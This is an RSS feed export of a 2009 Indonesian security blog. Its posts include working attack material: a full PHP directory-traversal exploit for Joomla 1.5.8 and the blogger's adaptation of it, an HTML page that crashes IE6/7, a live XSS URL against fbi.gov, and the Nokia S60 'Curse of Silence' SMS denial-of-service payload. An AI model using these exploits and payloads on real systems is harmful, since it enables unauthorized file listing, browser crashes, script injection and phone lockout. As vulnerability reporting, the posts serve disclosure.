<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	>

<channel>
	<title>w2vx3r'S BLOG</title>
	<atom:link href="http://williamblog.web.id/feed/" rel="self" type="application/rss+xml" />
	<link>http://williamblog.web.id</link>
	<description>about secure, secure and secure</description>
	<pubDate>Sat, 31 Jan 2009 01:49:34 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.7</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>&#8220;Kampus Terbaik&#8221; atau &#8220;Hanya Kampus Terbaik&#8221;??</title>
		<link>http://williamblog.web.id/2009/01/30/kampus-terbaik-atau-hanya-kampus-terbaik/</link>
		<comments>http://williamblog.web.id/2009/01/30/kampus-terbaik-atau-hanya-kampus-terbaik/#comments</comments>
		<pubDate>Fri, 30 Jan 2009 13:56:56 +0000</pubDate>
		<dc:creator>w2vx3r</dc:creator>
		
		<category><![CDATA[my campus]]></category>

		<category><![CDATA[gunadarma]]></category>

		<category><![CDATA[kampus]]></category>

		<category><![CDATA[Webometrics]]></category>

		<guid isPermaLink="false">http://williamblog.web.id/?p=96</guid>
		<description><![CDATA[&#8220;Webometrics: Gunadarma Kampus Swasta Terbaik&#8221;
Begitulah judul yang dilontarkan dari situs detik.com pada hari Kamis, 29/01/2009 14:50 WIB. Dibeberapa situs gunadarma, blog para staff dan para mahasiswa bertebaran berita ini dan ucapan selamat luar biasa banyaknya untuk kampus-ku ini. Apakah se-luar biasa itu berita ini??

Selidik punya selidik saya menelusuri beberapa situs dan blog yang membahas hal [...]]]></description>
			<content:encoded><![CDATA[<p>&#8220;<a href="http://www.webometrics.info/rank_by_country.asp?country=id">Webometrics</a>: Gunadarma Kampus Swasta Terbaik&#8221;</p>
<p>Begitulah judul yang dilontarkan dari situs <a href="http://www.detikinet.com/read/2009/01/29/145004/1076236/398/webometrics-gunadarma-kampus-swasta-terbaik">detik.com</a> pada hari Kamis, 29/01/2009 14:50 WIB. Dibeberapa situs gunadarma, blog para staff dan para mahasiswa bertebaran berita ini dan ucapan selamat luar biasa banyaknya untuk kampus-ku ini. Apakah se-luar biasa itu berita ini??</p>
<p><span id="more-96"></span></p>
<p>Selidik punya selidik saya menelusuri beberapa situs dan blog yang membahas hal ini dan mendapat hal yang menarik dari penilaian yang digunakan oleh si-<a href="http://www.webometrics.info/rank_by_country.asp?country=id">webometrics</a> ini. Penilaian dilakukan dengan 4 unsur penilaian. 4 unsur tersebut adalah visibility, rich files, size, dan google scholar.</p>
<p>&#8212;Visibility  merupakan banyaknya link external dari situs lain yang merujuk ke situs gunadarma atau sub-domainnya. Hal ini membuktikan banyaknya yang mengenal gunadarma dari dunia maya luar. (Mungkin untuk kedepannya unsur ini akan meningkat tajam seiring dengan peng-wajiban mahasiswa gunadarma memiliki blog dan mencantumkan link gunadarma diblognya).</p>
<p>&#8212;Rich Files merupakan banyaknya kekayaan file-file dalam bentuk pdf, word document, ppt dan lain sebagainya. Mungkin bisa diambil contoh yaitu file2 yang disediakan oleh para dosen di staffsitenya yang dapat kita download kapan saja.</p>
<p>&#8212;Size merupakan banyaknya halaman yang terdapat dalam situs gunadarma(termasuk sub domainnya) dimana semakin banyak maka akan menunjukkan banyaknya fasilitas yang disediakan oleh kampus tersebut.</p>
<p>&#8212;Google Scholar menyangkut banyaknya tulisan-tulisan ilmiah dari kampus tersebut.</p>
<p>Apa yang bisa ditangkap?? Masih terdapat kekurangan dari penilaian yang dilakukan oleh Webometrics. Penilaian yang dilakukan oleh Webometrics hanyalah mengukur ketersedian kampus akan banyaknya sumber-sumber materi yang disediakan, namun tidak menjamin sumber materi tersebut dimanfaatkan dengan baik. Hal yang dilakukan oleh Kampus Gunadarma adalah tepat yaitu menyediakan sumber materi tersebut tetapi untuk menjadi &#8220;kampus terbaik&#8221; tidak hanya sebatas itu kan??  Diperlukan partisipasi dan keaktifan mahasiswa untuk menjadi &#8220;kampus terbaik&#8221;.</p>
<p>Semoga dengan disediakannya fasilitas-fasilitas yang ada di kampus kita, kita dapat memanfaatkannya dengan baik. Kita juga tidak boleh terlalu bersenang hati dengan peringkat ini karena bisa menjadi bumerang kesombongan dan akhirnya membuat kita jatuh dilubang kesombongan kita sendiri. Akhir kata semoga Gunadarma bukan hanya menjadi &#8220;kampus terbaik&#8221; tetapi juga menjadi &#8220;kampus terbaik yang menghasikan mahasiswa terbaik&#8221;.</p>
]]></content:encoded>
			<wfw:commentRss>http://williamblog.web.id/2009/01/30/kampus-terbaik-atau-hanya-kampus-terbaik/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Situs FBI kena hack waktu nonton Wordpress.tv!!heh??</title>
		<link>http://williamblog.web.id/2009/01/18/situs-fbi-kena-hack-waktu-nonton-wordpresstv/</link>
		<comments>http://williamblog.web.id/2009/01/18/situs-fbi-kena-hack-waktu-nonton-wordpresstv/#comments</comments>
		<pubDate>Sun, 18 Jan 2009 06:42:30 +0000</pubDate>
		<dc:creator>w2vx3r</dc:creator>
		
		<category><![CDATA[News]]></category>

		<category><![CDATA[FBI]]></category>

		<category><![CDATA[hacking]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[wordpress]]></category>

		<category><![CDATA[wordpress.tv]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://williamblog.web.id/?p=79</guid>
		<description><![CDATA[Waduh,,,,apa ini yang terjadi?? Berita aneh apa lagi ini??? Sebenarnya ini dua berita yang di-mix jadi satu oleh saya,hahha,,


Berita pertama muncul dari wordpress yang mengeluarkan produk barunya yang bisa dibilang merupakan fasilitas yang berguna bagi para pecinta wordpress yang ingin tetap up to date dengan blognya di wordpress. Tidak hanya itu, fasilitas yang beralamatkan di [...]]]></description>
			<content:encoded><![CDATA[<p>Waduh,,,,apa ini yang terjadi?? Berita aneh apa lagi ini??? Sebenarnya ini dua berita yang di-mix jadi satu oleh saya,hahha,,</p>
<p style="text-align: center;"><img class="size-full wp-image-80 aligncenter" title="wptv-logo" src="http://williamblog.web.id/wp-content/uploads/2009/01/wptv-logo.png" alt="wptv-logo" width="210" height="40" /></p>
<p><span id="more-79"></span></p>
<p>Berita pertama muncul dari wordpress yang mengeluarkan produk barunya yang bisa dibilang merupakan fasilitas yang berguna bagi para pecinta wordpress yang ingin tetap up to date dengan blognya di wordpress. Tidak hanya itu, fasilitas yang beralamatkan di wordpress.tv ini juga membantu para awam dalam mengenal dan mengatur wordpressnya. Yang kerennya kita tidak perlu membaca tulisan (baca: teks) karena telah disediakan dalam bentuk video yang menarik!! Yang patut disayangkan bandwidth internet-ku tidaklah cukup untuk melihat semua video menarik yang ditawarkan oleh wordpress.tv  ,hehehehe,,,</p>
<p>Berita Kedua datang dari negeri Paman Obama,hehhe,,, Tanggal 17 kemarin pada forum bugtraq yang beralamatkan di http://seclists.org/bugtraq/2009/Jan/0164.html  telah diumumkan situs FBI terkena penyakit XSS (Cross-site scripting). Letaknya di http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/&lt;/script&gt;&lt;script/defer&gt;document.body.innerHTML=&#8217;xssed&#8217;+unescape(&#8217;%20&#8242;)+&#8217;by&#8217;+unescape(&#8217;%20&#8242;)+&#8217;Matrix(S.B)&#8217;&lt;/script&gt;</p>
<p>Yang pada waktu saya kunjungi masih belum dipatch.</p>
<p><img class="alignnone size-full wp-image-81" title="xss-in-fbi" src="http://williamblog.web.id/wp-content/uploads/2009/01/xss-in-fbi.jpg" alt="xss-in-fbi" width="508" height="310" /></p>
<p><img class="alignnone size-full wp-image-82" title="redirect-fbi" src="http://williamblog.web.id/wp-content/uploads/2009/01/redirect-fbi.jpg" alt="redirect-fbi" width="600" height="266" /></p>
<p>Ternyata ga cuman situs-situs pemerintah Indonesia saja yang jadi incaran ya,,,,</p>
]]></content:encoded>
			<wfw:commentRss>http://williamblog.web.id/2009/01/18/situs-fbi-kena-hack-waktu-nonton-wordpresstv/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Ada apa dengan gmail di germany??</title>
		<link>http://williamblog.web.id/2009/01/15/ada-apa-dengan-gmail-di-germany/</link>
		<comments>http://williamblog.web.id/2009/01/15/ada-apa-dengan-gmail-di-germany/#comments</comments>
		<pubDate>Thu, 15 Jan 2009 00:35:03 +0000</pubDate>
		<dc:creator>w2vx3r</dc:creator>
		
		<category><![CDATA[research of the month]]></category>

		<category><![CDATA[germany]]></category>

		<category><![CDATA[gmail]]></category>

		<category><![CDATA[lisensi]]></category>

		<category><![CDATA[research]]></category>

		<guid isPermaLink="false">http://williamblog.web.id/?p=71</guid>
		<description><![CDATA[
OKe,,,,dilihat dari gambar, apa yang bisa disimpulkan???
Karena saya juga ga begitu mengetahuinya, mungkin dari temen-temen ada yang pernah mengalaminya atau ada yang punya penjelasan akan hal ini??

Yang pasti ini bukan rekayasa dan ini saya alami sendiri. Mari kita &#8220;research&#8221; bersama.
]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone size-full wp-image-77" title="germany-in-gmail" src="http://williamblog.web.id/wp-content/uploads/2009/01/germany-in-gmail.jpg" alt="germany-in-gmail" width="610" height="476" /></p>
<p>OKe,,,,dilihat dari gambar, apa yang bisa disimpulkan???</p>
<p>Karena saya juga ga begitu mengetahuinya, mungkin dari temen-temen ada yang pernah mengalaminya atau ada yang punya penjelasan akan hal ini??</p>
<p><span id="more-71"></span></p>
<p>Yang pasti ini bukan rekayasa dan ini saya alami sendiri. Mari kita &#8220;research&#8221; bersama.</p>
]]></content:encoded>
			<wfw:commentRss>http://williamblog.web.id/2009/01/15/ada-apa-dengan-gmail-di-germany/feed/</wfw:commentRss>
		</item>
		<item>
		<title>High Security Risk Joomla, Directory Traversal</title>
		<link>http://williamblog.web.id/2009/01/12/high-security-risk-joomla-directory-traversal/</link>
		<comments>http://williamblog.web.id/2009/01/12/high-security-risk-joomla-directory-traversal/#comments</comments>
		<pubDate>Mon, 12 Jan 2009 14:37:38 +0000</pubDate>
		<dc:creator>w2vx3r</dc:creator>
		
		<category><![CDATA[Joomla]]></category>

		<category><![CDATA[News]]></category>

		<category><![CDATA[Security]]></category>

		<category><![CDATA[Updates]]></category>

		<category><![CDATA[Vulnerabilities]]></category>

		<category><![CDATA[Web]]></category>

		<category><![CDATA[directory traversal]]></category>

		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://williamblog.web.id/?p=59</guid>
		<description><![CDATA[Berita ini mungkin sudah basi, sudah sekitar 2 hari sejak Team Joomla mengeluarkan peringatan untuk mengupdate Joomla versi 1.5.8 ke versi 1.5.9 (tepatnya tanggal 10 January). Memang tanggal 07 January 2009 di situs kesayangan saya sudah diberitakan hal tersebut. Dalam berita tersebut dikatakan bahwa “Joomla &#60;= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability”, Joomla versi [...]]]></description>
			<content:encoded><![CDATA[<p>Berita ini mungkin sudah basi, sudah sekitar 2 hari sejak Team Joomla mengeluarkan peringatan untuk mengupdate Joomla versi 1.5.8 ke versi 1.5.9 (tepatnya tanggal 10 January). Memang tanggal 07 January 2009 di situs <a href="http://www.milw0rm.com/exploits/7691">kesayangan saya</a> sudah diberitakan hal tersebut. Dalam berita tersebut dikatakan bahwa “Joomla &lt;= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability”, Joomla versi dibawah dari 1.5.8 dan versi 1.5.8 tersebut pada modul xstandard terdapat celah sehingga dapat dimungkinkan orang luar melihat isi dari direktori yang ada pada web korban. Sungguh sangat disayangkan pada saat itu saya sedang mempersiapkan ujian sehingga tidak dapat berexplorasi lebih lanjut,hahaha</p>
<p><span id="more-59"></span></p>
<p>Oke walaupun sudah banyak website yang meng-update versi joomlanya, tapi saya akan bahas tuntas tentang vulnerable yang satu ini. Pertama saya akan berikan source asli dari advisory(si penemu celah ini).</p>
<table border="1">
<tbody>
<tr>
<td>&lt;?php</p>
<p>/*</p>
<p>Joomla &lt;= 1.5.8 (xstandard editor) Local Directory Traversal</p>
<p>Vulnerability</p>
<p>discovered by: irk4z[at]yahoo.pl</p>
<p>greets: all friends <img src='http://williamblog.web.id/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>*/</p>
<p>echo &#8220;* Joomla &lt;= 1.5.8 (xstandard editor) Local Directory Traversal</p>
<p>Vulnn&#8221;;</p>
<p>echo &#8220;* discovered by: irk4z[at]yahoo.pln&#8221;;</p>
<p>echo &#8220;*n&#8221;;</p>
<p>echo &#8220;* greets: all friends <img src='http://williamblog.web.id/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> enjoy!n&#8221;;</p>
<p>echo</p>
<p>&#8220;*&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;*n&#8221;;</p>
<p>$host = $argv[1];</p>
<p>$path = $argv[2];</p>
<p>$folder = $argv[3];</p>
<p>if (empty($host) || empty($path)) {</p>
<p>echo &#8220;usage: php {$argv[0]} &lt;host&gt; &lt;path&gt; [&lt;folder&gt;]n&#8221;;</p>
<p>echo &#8221; php {$argv[0]} example.org /joomlan&#8221;;</p>
<p>echo &#8221; php {$argv[0]} example.org /joomla ../../n&#8221;;</p>
<p>exit;</p>
<p>}</p>
<p>echo &#8220;http://&#8221; . $host . $path . &#8220;/images/stories/nn&#8221;;</p>
<p>if ( empty($folder) ){</p>
<p>$lev = &#8220;./&#8221;;</p>
<p>for( $i = 0; $i &lt;= 7; $i++ ) {</p>
<p>echo browseFolder($host, $path, $lev);</p>
<p>$lev .= &#8220;../&#8221;;</p>
<p>}</p>
<p>} else {</p>
<p>echo browseFolder($host, $path, $folder);</p>
<p>}</p>
<p>function browseFolder($host, $path, $folder){</p>
<p>$packet = &#8220;GET {$path}/plugins/editors/xstandard/attachmentlibrary.php</p>
<p>HTTP/1.1rn&#8221;;</p>
<p>$packet .= &#8220;Host: {$host}rn&#8221;;</p>
<p>$packet .= &#8220;X_CMS_LIBRARY_PATH: {$folder}rn&#8221;;</p>
<p>$packet .= &#8220;Connection: Closernrn&#8221;;</p>
<p>$o = @fsockopen($host, 80);</p>
<p>if(!$o){</p>
<p>echo &#8220;n[x] No response&#8230;n&#8221;;</p>
<p>die;</p>
<p>}</p>
<p>fputs($o, $packet);</p>
<p>while (!feof($o)) $data .= fread($o, 1024);</p>
<p>fclose($o);</p>
<p>$_404 = strstr( $data, &#8220;HTTP/1.1 404 Not Found&#8221; );</p>
<p>if ( !empty($_404) ){</p>
<p>echo &#8220;n[x] 404 Not Found&#8230; Maybe wrong path? n&#8221;;</p>
<p>die;</p>
<p>}</p>
<p>//folders</p>
<p>preg_match_all(&#8221;/&lt;baseURL&gt;([^&lt;]+)&lt;/baseURL&gt;/&#8221;, $data, $matches);</p>
<p>//files</p>
<p>preg_match_all(&#8221;/&lt;value&gt;([^&lt;]+.[^&lt;]{3,4})&lt;/value&gt;/&#8221;, $data, $matches2);</p>
<p>$matches = array_merge( $matches[1], $matches2[1] );</p>
<p>if ( empty($matches) ){</p>
<p>$ret = &#8220;$folder [x] Failed&#8230;n&#8221;;</p>
<p>} else {</p>
<p>$ret = &#8221;;</p>
<p>foreach( $matches as $tmp){</p>
<p>$ret .= str_replace(&#8221;images/stories/&#8221;, &#8221;, str_replace(&#8221;/./&#8221;, &#8220;/&#8221;,</p>
<p>str_replace(&#8221;//&#8221;, &#8220;/&#8221;, urldecode($tmp) ) ) ) . &#8220;n&#8221;;</p>
<p>}</p>
<p>}</p>
<p>return ($ret);</p>
<p>}</p>
<p>?&gt;</td>
</tr>
</tbody>
</table>
<p>Mungkin anda sudah sangat muak melihat bahasa PHP tersebut, tetapi ternyata tidak semua bagian harus kita ubah agar proses “Local Directory Traversal” dapat berjalan. Saya hanya akan mengubah beberapa bagian seperti dibawah ini (yang digaris tebal merupakan yang saya ubah)</p>
<table border="1">
<tbody>
<tr>
<td>&lt;?php</p>
<p>/*</p>
<p>Joomla &lt;= 1.5.8 (xstandard editor) Local Directory Traversal</p>
<p>Vulnerability</p>
<p>discovered by: irk4z[at]yahoo.pl</p>
<p>greets: all friends <img src='http://williamblog.web.id/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>*/</p>
<p>echo &#8220;* Joomla &lt;= 1.5.8 (xstandard editor) Local Directory Traversal</p>
<p>Vulnn&#8221;;</p>
<p>echo &#8220;* discovered by: irk4z[at]yahoo.pln&#8221;;</p>
<p>echo &#8220;*n&#8221;;</p>
<p>echo &#8220;* greets: all friends <img src='http://williamblog.web.id/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> enjoy!n&#8221;;</p>
<p>echo</p>
<p>&#8220;*&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;*n&#8221;;</p>
<p>$host = &#8220;<strong>localhost</strong>&#8220;;</p>
<p>$path = &#8220;<strong>/joomlah/Joomla_1.5.5-Stable-Full_Package</strong>&#8220;;</p>
<p>$folder = &#8220;<strong>apa saja</strong>&#8220;;</td>
</tr>
</tbody>
</table>
<p>Pada bagian $host merupakan alamat website yang ingin dilihat, disini saya menggunakan localhost (tentunya anda bisa mencobanya website diluar sana, saya menggunakan localhost karena keterbatasan waktu) Kemudian $path merupakan bagian jalur atau tambahan yang ada di website korban (misalnya: william.web.id/iniadalahpath/ ) dan $folder mungkin berguna untuk menentukan folder mana yang ingin dilihat sebagai ganti dari website yang tidak terdapat “path”, karena saya menggunakan path maka saya dapat memasukkan kata apa saja dan tidak banyak pengaruhnya (CMIIW). Oke tanpa basa basi kita lihat hasilnya:</p>
<p><img class="alignnone size-full wp-image-60" title="joomla-local-directory" src="http://williamblog.web.id/wp-content/uploads/2009/01/joomla-local-directory.jpg" alt="joomla-local-directory" width="581" height="202" /></p>
<p>Terlihat isi dari file-file dimana letak direktorinya adalah http://localhost/joomlah/Joomla_1.5.5-Stable-Full_Package//images/stories/&#8230; Yang secara standarnya digunakan untuk menyimpan file-file gambar dan media pada para pengguna Joomla. Apakah hanya folder images/stories saja yang bisa terlihat?? Dalam percobaan singkat yang saya lakukan memang hanya folder images/stories saja yang bisa dilihat. Mungkin anda dapat memberitahu saya apabila ada folder lain yang dapat dilihat. Oiya,,,celah ini hanya akan menampilkan susunan folder dan file yang disimpan dalam images/stories. Tapi tentu saja dengan mengetahui nama filenya kita dapat mendownload file-file yang ditampilkan dalam list yang ada.</p>
<p>Celah ini dikategorikan “high” oleh Team Joomla dan saya sependapat dikarenakan menampilkan suatu folder yang semestinya tidak ditampilkan dapat berakibat fatal dan dapat dilakukan exploitasi lebih lanjut.</p>
]]></content:encoded>
			<wfw:commentRss>http://williamblog.web.id/2009/01/12/high-security-risk-joomla-directory-traversal/feed/</wfw:commentRss>
		</item>
		<item>
		<title>IE crash!! (Again?)</title>
		<link>http://williamblog.web.id/2009/01/10/ie-crash/</link>
		<comments>http://williamblog.web.id/2009/01/10/ie-crash/#comments</comments>
		<pubDate>Sat, 10 Jan 2009 10:39:14 +0000</pubDate>
		<dc:creator>w2vx3r</dc:creator>
		
		<category><![CDATA[News]]></category>

		<category><![CDATA[Security]]></category>

		<category><![CDATA[Updates]]></category>

		<category><![CDATA[Vulnerabilities]]></category>

		<category><![CDATA[Web]]></category>

		<category><![CDATA[browser]]></category>

		<category><![CDATA[bugs]]></category>

		<category><![CDATA[crash]]></category>

		<category><![CDATA[IE]]></category>

		<category><![CDATA[Internet Explorer]]></category>

		<guid isPermaLink="false">http://williamblog.web.id/?p=49</guid>
		<description><![CDATA[Satu lagi hadiah kecil dari Microsoft Internet Explorer. Kemarin tepatnya tanggal 9 January 2009 dikabarkan dalam artikel aslinya dengan judul yang biasa saja (“MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit”) tetapi sangat kritis ternyata didalamnya, terdapat “bug” atau semacamnya (CMIIW) yang dapat mengakibatkan “hang” total dan membuat browser IE ini menutup dirinya [...]]]></description>
			<content:encoded><![CDATA[<p>Satu lagi hadiah kecil dari Microsoft Internet Explorer. Kemarin tepatnya tanggal 9 January 2009 dikabarkan dalam artikel <a href="http://www.milw0rm.com/exploits/7710">aslinya</a> dengan judul yang biasa saja (“MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit”) tetapi sangat kritis ternyata didalamnya, terdapat “bug” atau semacamnya (CMIIW) yang dapat mengakibatkan “hang” total dan membuat browser IE ini menutup dirinya sendiri. Lihat gambar dibawah ini:</p>
<p><span id="more-49"></span></p>
<p><img class="alignnone size-medium wp-image-50" title="iecrash" src="http://williamblog.web.id/wp-content/uploads/2009/01/iecrash-300x202.jpg" alt="iecrash" width="300" height="202" /></p>
<p>Untuk membuat hang IE hanya dengan mengetikkan script HTML seperti ini:<br />
==============================================<br />
&lt;html&gt;<br />
&lt;title&gt;MS IE &#8217;screen[""]&#8216; Remote Denial of Service Vulnerability&lt;/title&gt;<br />
&lt;body onload=screen[""]&gt;<br />
&lt;/html&gt;</p>
<p>==============================================</p>
<p>Yupe sebuah javascript didalamnya dengan proses “onload”. Yang gw baca diartikel aslinya, ini dikarenakan pada saat pemprosesan fungsi onload dibelakang layar oleh IE dimana berisi NULL pointer sehingga IE menjadi crash!! (CMIIW again).<br />
Bug ini dapat berfungsi di IE6 dan IE7. It tested and works!! Dan sampai artikel ini diturunkan belum ada patch yang dilakukan oleh Microsoft.<br />
Penggunaannya??? Dikembalikan lagi ke imajinasi masing-masing. Atau ada yang mau ikut “menggerogoti IE” seperti yang apa ditulis pada artikel-artikel ini??</p>
<p><a href="http://techno.okezone.com/index.php/ReadStory/2009/01/02/55/178892/firefox-safari-chrome-terus-mengancam-ie">Firefox, Safari, &amp; Chrome Terus Mengancam IE</a><br />
<a href="http://detikinet.com/read/2009/01/03/125956/1062449/317/ie-mengurus-digerogoti-firefox-safari-dan-chrome">IE &#8216;Mengurus&#8217; Digerogoti Firefox, Safari dan Chrome</a></p>
]]></content:encoded>
			<wfw:commentRss>http://williamblog.web.id/2009/01/10/ie-crash/feed/</wfw:commentRss>
		</item>
		<item>
		<title>NOKIA Series 60 Vulnerability!!</title>
		<link>http://williamblog.web.id/2009/01/06/nokia-series-60-vulnerability/</link>
		<comments>http://williamblog.web.id/2009/01/06/nokia-series-60-vulnerability/#comments</comments>
		<pubDate>Tue, 06 Jan 2009 15:14:16 +0000</pubDate>
		<dc:creator>w2vx3r</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[Vulnerabilities]]></category>

		<category><![CDATA[bugs]]></category>

		<category><![CDATA[nokia]]></category>

		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://williamblog.web.id/?p=22</guid>
		<description><![CDATA[Desember 31 2008 I get some issue from Techworld.com about &#8220;Phone hit by Curse of Silence attack”. For that time, I’m not interesting about that topic. In January 2 2009, I have same (not actually) issue from Packet Strom Security. This is summary about that news:
“Nokia S60 phones suffer from a SMS/MMS curse of silence [...]]]></description>
			<content:encoded><![CDATA[<p>Desember 31 2008 I get some issue from Techworld.com about &#8220;Phone hit by Curse of Silence attack”. For that time, I’m not interesting about that topic. In January 2 2009, I have same (not actually) issue from <a href="http://packetstormsecurity.org/filedesc/nokia560-dos.txt.html">Packet Strom Security</a>. This is summary about that news:</p>
<p><span id="more-22"></span>“Nokia S60 phones suffer from a SMS/MMS curse of silence denial of service vulnerability when having received a message with an email address over 32 characters.”</p>
<p>And I get twice a same news about this from Packet Strom Security (maybe my feeds error,hahaha). So I check it out, and find some interest knowledge from this vulnerability. You can see the complete story about this Nokia series 60 phones vulnerable from <a href="https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt">this link</a> or you can download the <a href="https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-demo.avi">video</a> so you can watch how can it works! </p>
<p>Suggestion from me, don’t abuse that!!<br />
Here is the complete story where I copy from https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt</p>
<p>================================================================<br />
Vulnerability Advisory<br />
======================<br />
Remote SMS/MMS Denial of Service - &#8220;Curse Of Silence&#8221; for Nokia S60 phones</p>
<p>URL<br />
===<br />
https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt</p>
<p>Video<br />
=====<br />
https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-demo.avi</p>
<p>Affected Products<br />
=================<br />
All Nokia Series60 2.6, 2.8, 3.0, 3.1 devices, see detailed list at<br />
the end of the document.</p>
<p>Requirements to Execute Attack<br />
==============================<br />
- MSISDN of the target<br />
- mobile phone contract that allows sending of SMS messages<br />
- (almost) any Nokia phone (or some other means of sending SMS messages with TP-PID set to &#8220;Internet Electronic Mail&#8221;)</p>
<p>Risk Level<br />
==========<br />
Medium (for S60 2.8 and 3.1 devices): Target will not be able to receive any SMS or MMS messages while the attack is ongoing. After that, only very limited message receiving is possible until the device is Factory Resetted High (for S60 2.6 and 3.0 devices): Target will not be able to receive any SMS or MMS messages until the device is Factory Resetted</p>
<p>Summary<br />
=======<br />
Emails can be sent via SMS by setting the messages Protocol Identifier to &#8220;Internet Electronic Mail&#8221; and formatting the message like this:</p>
<p>&lt;email-address&gt;&lt;space&gt;&lt;message body&gt;</p>
<p>If such messages contain an &lt;email-address&gt; with more than 32 characters, S60 2.6, 2.8, 3.0 and 3.1 devices are not able to receive other SMS or MMS messages anymore. 2.6 and 3.0 devices lock up after only one message, 2.8 and 3.1 devices after 11 messages.</p>
<p>Details<br />
=======<br />
3GPP TS 23.040 specifies a method for sending emails via SMS in section 3.8 (&#8221;SMS and Internet Electronic Mail interworking&#8221;). In its most basic form, such a SMS message starts with the from- (MT-SMS) or to-email-address (MO-SMS), followed by a space character, and then the message body. The TP-Procotol Identifier of the SMS message has to be set to &#8220;Internet Electronic Mail&#8221; (value: 50 / 0&#215;32).</p>
<p>It is not specified how such a message should be displayed when received by the phone. Before S60 2.6, Series60 devices displayed such messages exactly as they were sent. Starting with S60 2.6, when the part of the message that should contain the from-address looks anything like an email address (i.e. it contains an &#8220;@&#8221; somewhere), this address is then displayed as the message sender instead of the usually shown TP-Originating-Address.</p>
<p>If this email address is longer than 32 characters, Series60 2.6, 2.8, 3.0 and 3.1 devices fail to display the message or give any indication on the user interface that such a message has been received. They do, however, signal to the SMSC that they received the message by sending an RP-ACK.</p>
<p>Devices running S60 2.6 or 3.0 will not be able to receive any other SMS message after that. The user interface does not give any indication of this situation. The only action to remedy this situation seems to be a Factory Reset of the device (by entering &#8220;*#7370#&#8221;).</p>
<p>Devices running S60 2.8 or 3.1 react a little different: They do not lock up until they received at least 11 SMS-email messages with an email address that is longer than 32 characters. The device will not be able to receive any other SMS message after that - upon receiving the next message, the phone will just display a warning that there is not enough memory to receive further messages and that data should be deleted first. This message is even displayed on an otherwise completely &#8220;empty&#8221; device.</p>
<p>After switching the phone off and on again, it has limited capability for receiving SMS messages again: If it receives a SMS message that is split up into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated Short Messages) it is only able to receive the first part and will display the &#8220;not enough memory&#8221; warning again. After powercycling the device again, it can then receive the second part. If there is a third part, it has to be powercycled again, and so on.<br />
Also, an attacker now just needs to send one more &#8220;Curse Of Silence&#8221; message to lock the phone up again. By always sending yet another one as soon as the status report for delivery of the previous message is received, the attacker could completely prevent a target from receiving any other SMS/MMS messages.</p>
<p>Only Factory Resetting the device will restore its full message receiving capabilities. Note that, if a backup is made using Nokia PC-Suite *after* being attacked, the blocking messages are also backuped and will be sent to the device again when restoring the backup after the Factory Reset.</p>
<p>Note that not being able to receive SMS messages also means not being able to receive MMS messages, since they are signalled by sending an SMS message to the device.</p>
<p>&#8220;Curse Of Silence&#8221; messages can be generated with any phone or cellular modem that supports 3GPP TS 27.005 AT commands and with most Nokia phones also directly from the user interface. For example, on S60 devices, when in the message editor, the type of the message can be switched to &#8220;E-mail&#8221; under &#8220;Options&#8221; -&gt; &#8220;Sending options&#8221; -&gt; &#8220;Message sent as&#8221;. The 6310i conveniently offers a &#8220;Write email&#8221; menu entry in the messaging menu.</p>
<p>The simplest form of content for a Curse Of Silence would be something like &#8220;123456789@123456789.1234567890123 &#8221; (the digits are used only to illustrate the length of the &#8220;email address&#8221; of more than 32 characters). Note the space at the end of the message!</p>
<p>Workaround<br />
==========</p>
<p>None known for the user side.</p>
<p>Until a firmware fix is available, network operators should filter messages with TP PID &#8220;Internet Electronic Mail&#8221; and an email address of more than 32 characters or reset the TP-PID of these messages to 0.</p>
<p>Credits<br />
=======</p>
<p>Tobias Engel &lt;tobias@ccc.de&gt;<br />
November 9, 2008</p>
<p>Many thanks to Frank Rieger for spending countless hours cutting and editing the video.</p>
<p>Detailed List of Affected Products<br />
==================================</p>
<p>Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable component is a S60 base functionality, it seems safe to assume that all devices with these OS versions are affected.</p>
<p>S60 3rd Edition, Feature Pack 1 (S60 3.1):<br />
Nokia E90 Communicator<br />
Nokia E71<br />
Nokia E66<br />
Nokia E51<br />
Nokia N95 8GB<br />
Nokia N95<br />
Nokia N82<br />
Nokia N81 8GB<br />
Nokia N81<br />
Nokia N76<br />
Nokia 6290<br />
Nokia 6124 classic<br />
